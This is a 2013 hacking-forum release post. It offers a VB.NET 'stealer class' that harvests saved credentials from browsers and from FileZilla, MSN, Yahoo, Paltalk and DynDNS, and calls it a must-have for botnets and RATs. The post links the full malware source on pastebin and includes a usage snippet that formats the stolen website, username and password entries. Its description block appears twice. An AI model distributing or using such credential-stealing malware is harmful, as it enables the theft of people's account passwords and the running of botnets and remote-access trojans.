[Release] Stealer Class 05-27-2013, 01:11 PM
#1
Stealer Class
This is a stealer class for Visual Basic .NET, it covers everything from Opera, Chrome, IE and Firefox to FileZilla, MSN, Yahoo, Paltalk and DynDNS. This is a must-have for botnets as well as RATs. I'm not the author of this script, and by the looks of it, it looks like somebody just put together a lot of sources. Either way, I do not know who the author is, I picked this up somewhere on a german forum.
Usage
Download
The code is so large I'll put it somewhere else.
http://pastebin.com/raw.php?i=eUEmtQUe
This is a stealer class for Visual Basic .NET, it covers everything from Opera, Chrome, IE and Firefox to FileZilla, MSN, Yahoo, Paltalk and DynDNS. This is a must-have for botnets as well as RATs. I'm not the author of this script, and by the looks of it, it looks like somebody just put together a lot of sources. Either way, I do not know who the author is, I picked this up somewhere on a german forum.
Usage
Code:
'
Dim passwords As String = A.GT()
'Alternatively, leave as is with the prefixes. Just remove the three next lines.
passwords = passwords.Replace("|URL|", vbNewLine & "Website:")
passwords = passwords.Replace("|USR|", "Username:")
passwords = passwords.Replace("|PWD|", "Password:")
Messagebox.Show(passwords)
Download
The code is so large I'll put it somewhere else.
http://pastebin.com/raw.php?i=eUEmtQUe